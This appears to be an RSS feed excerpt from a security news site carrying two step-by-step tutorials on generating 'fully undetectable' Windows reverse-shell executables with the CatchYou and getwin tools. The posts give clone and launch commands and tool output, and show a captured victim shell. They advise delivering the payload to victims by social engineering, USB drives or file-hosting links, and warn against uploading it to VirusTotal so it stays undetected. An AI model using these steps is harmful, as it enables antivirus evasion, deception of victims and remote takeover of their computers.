Information Security News|Cyber Security|Hacking Tutorial https://www.securitynewspaper.com/ Information Security Newspaper|Infosec Articles|Hacking News Fri, 23 Jul 2021 20:42:18 +0000 en-US hourly 1 https://wordpress.org/?v=6.5.4 https://www.securitynewspaper.com/snews-up/2018/12/news5.png Information Security News|Cyber Security|Hacking Tutorial https://www.securitynewspaper.com/ 32 32 Bypass Antivirus with Fully Undetectable(FUD) payload – Step By Step https://www.securitynewspaper.com/2020/04/27/bypass-antivirus-with-fully-undetectablefud-payload-step-by-step/ Mon, 27 Apr 2020 15:23:32 +0000 https://www.securitynewspaper.com/?p=19571 Introduction When a hacker sends any malicious file to the victim, most of the tool doesn’t bypass the antivirus (AV) protection. But today we will talk about a tool thatRead More →

The post Bypass Antivirus with Fully Undetectable(FUD) payload – Step By Step appeared first on Information Security Newspaper | Hacking News.

]]>
Introduction

When a hacker sends any malicious file to the victim, most of the tool doesn’t bypass the antivirus (AV) protection. But today we will talk about a tool that can bypass the antivirus protection and compromise the victim’s machine. Ethical hacking researcher are always finding easy ways to bypass Antivirus protection, however there are many more way to bypass antivirus protection.

Now coming to a tool called CatchYou, it’s a social engineering tool which can be used to compromise any windows machine by sending one link to the victim. In this tool, we are using Metasploit Framework to exploit the victim’s machine and Ngrok server as reverse proxy to access private machines on network. This CatchYou tool is easy to install and we will demonstrate the working of this tool in step by step manner.

Environment

  • OS: Kali Linux 2019.3 64 bit
  • Kernel-version: 5.2.0

Installation Steps

 root@kali:/home/iicybersecurity# git clone https://github.com/thelinuxchoice/catchyou
Cloning into 'catchyou'...
remote: Enumerating objects: 26, done.
remote: Counting objects: 100% (26/26), done.
remote: Compressing objects: 100% (25/25), done.
remote: Total 26 (delta 10), reused 0 (delta 0), pack-reused 0
Unpacking objects: 100% (26/26), 21.74 KiB | 53.00 KiB/s, done.
  • Use the cd command to enter into catchyou directory.
root@kali:/home/iicybersecurity# cd catchyou/
root@kali:/home/iicybersecurity/catchyou#
  • Now, use this command to launch this tool.
CatchYou
CatchYou
  • Here, choose the payload option to exploit the victim’s machine.
Windows Payload
Windows Payload
  • Here, it will generate two files catchyou.exe and index.php
Metasploit on hacker machine
Metasploit on hacker machine
  • Now we selected windows shell reverse_tcp and enter the LHOST and LPORT.
  • Here we can see that the payload is saved as catchyou.exe and it started the Metasploit Listener by selecting option Y
  • catchyou.exe file will be saved in catchyou directory.
  • Now send this exe file to the victim by using Pendrive or by sending URL using social engineering.
  • For sending URL using social engineering, we can also Pwndrop tool.
  • pwndrop tool can be used to host your own server and send any file very securely to another person, can be malicious file also.
  • Click here to follow pwndrop setup.
  • Here, we used pwndrop tool to send the URL to victim. Once the Victim click on the URL, it downloads the FUD payload. As shown below.
Malicious link downloading Catchyou.exe on Victim
Malicious link downloading Catchyou.exe on Victim
  • If the victim opens this exe file on his machine, we will get the shell of victims machine.
Victim's Shell
Victim’s Shell

Conclusion

We saw on how easy is to compromise the victim’s computer by sending the URL or malicious file to the victim. DO NOT UPLOAD THE PAYLOAD GENERATED ON VIRUSTOTAL.

The post Bypass Antivirus with Fully Undetectable(FUD) payload – Step By Step appeared first on Information Security Newspaper | Hacking News.

]]>
Create Windows 10 FUD (Fully Undetectable) payload https://www.securitynewspaper.com/2019/06/20/create-windows-10-fud-fully-undetectable-payload/ Thu, 20 Jun 2019 16:44:42 +0000 https://www.securitynewspaper.com/?p=15550 Windows shell is what, every hacker loves. There are various Windows payloads are designed to bypass Windows OS security mechanism. According to ethical hacking researcher of international institute of cyberRead More →

The post Create Windows 10 FUD (Fully Undetectable) payload appeared first on Information Security Newspaper | Hacking News.

]]>
Windows shell is what, every hacker loves. There are various Windows payloads are designed to bypass Windows OS security mechanism. According to ethical hacking researcher of international institute of cyber security these payloads are well coded to get sessions of Windows OS. There are many different ways of getting reverse shell. Today we will show getwin tool used to create Win32 payload and listener.

Payload generated by this tool is FUD (fully undetectable) by Windows 10 Defender. Do Not Upload the payload generated on virustotal.com.

The tool does not need any configuration, no need to configure port forwarding or install other programs. See the demonstration in below video.

  • For testing purposes, On attacker side we will use Kali Linux 2018.4 amd64 and on the Victim side we will use Windows 10 1809.
  • Open terminal type git clone https://github.com/thelinuxchoice/getwin.git
  • Then type cd getwin & type chmod u+x getwin.sh
root@kali:/home/iicybersecurity/Downloads# git clone https://github.com/thelinuxchoice/getwin.git
 Cloning into 'getwin'…
 remote: Enumerating objects: 46, done.
 remote: Total 46 (delta 0), reused 0 (delta 0), pack-reused 46
 Unpacking objects: 100% (46/46), done.
 root@kali:/home/iicybersecurity/Downloads# cd getwin/
 root@kali:/home/iicybersecurity/Downloads/getwin# chmod u+x getwin.sh
 root@kali:/home/iicybersecurity/Downloads/getwin# ls
 getwin.sh  icon  LICENSE  README.md
  • Type ./getwin.sh
root@kali:/home/iicybersecurity/Downloads/getwin# ./getwin.sh
     _______                _  _  _  _
    (_______)          _   (_)(_)(_)(_)
     _   ___  _____  _| |_  _  _  _  _  ____
    | | (_  || ___ |(_   _)| || || || ||  _ \
    | |___) || ____|  | |_ | || || || || | | |
     \_____/ |_____)   \__) \_____/ |_||_| |_|v1.2

.:.: FUD win32 payload generator and listener :.:.
        .:.: Coded by:@linux_choice :.:.

     :: Warning: Attacking targets without  ::
     :: prior mutual consent is illegal!    ::
  • After the tool has started, press enter to set default port. Then enter payload name(test01) and select the icon.
 [*] Choose a Port (Default: 4098 ):
 [*] Payload name (Default: payload ): test01
 [] Put ICON path (Default: icon/messenger.ico ): [] Compiling…
 [] Saved: test01.exe [!] Please, don't upload to virustotal.com ! [] Starting server…
 [*] Send the first link above to target + /test01.exe:
 Forwarding HTTP traffic from https://ludius.serveo.net
 Forwarding TCP connections from serveo.net:2119
 [*] Waiting connection…
 listening on [any] 1547 …
  • As you can see listener connection has started. Now you can use any social engineering trick to execute the payload in victim computer.
  • For testing we will use Windows 10 1809 with Windows Defender enabled.
  • So now we will execute the payload in Windows 10 OS.
  • After creating the payload (test01.exe). Execute the payload (test01.exe). Simply double click the executable.
  • As you double click on the payload (test01.exe). A session will be created between victim and the target machine and you will get windows shell.
  • Tools like this are the part of ethical hacking courses offered by International Institute of Cyber Security

Do Not Upload the payload generated on virustotal.com

[*] Waiting connection…
 listening on [any] 4342 …
 connect to [127.0.0.1] from localhost [127.0.0.1] 43878
 TCP connection from 27.4.174.190 on port 3352
 Microsoft Windows [Version 10.0.17758.1]
 (c) 2018 Microsoft Corporation. All rights reserved.
 E:>C:
 C:
 C:>ipconfig
 ipconfig
 Windows IP Configuration
 Ethernet adapter Ethernet0:
 Connection-specific DNS Suffix  . :
    Link-local IPv6 Address . . . . . : fe80::c947:1c34:3f73:be30%13
    IPv4 Address. . . . . . . . . . . : 192.168.1.5
    Subnet Mask . . . . . . . . . . . : 255.255.255.0
    Default Gateway . . . . . . . . . : fe80::1%13
                                        192.168.1.1
C:>getmac
 getmac
 Physical Address    Transport Name
 =================== ==========================================================
 ##-##-##-E8-##-##   \Device\Tcpip_{F237F6ED-8EC9-42C1-93F8-E95EDB31D7FC}

(For security reasons we have hide the MAC address)
  • Now attacker can change or view any file of target’s Windows 10 computer.

The post Create Windows 10 FUD (Fully Undetectable) payload appeared first on Information Security Newspaper | Hacking News.

]]>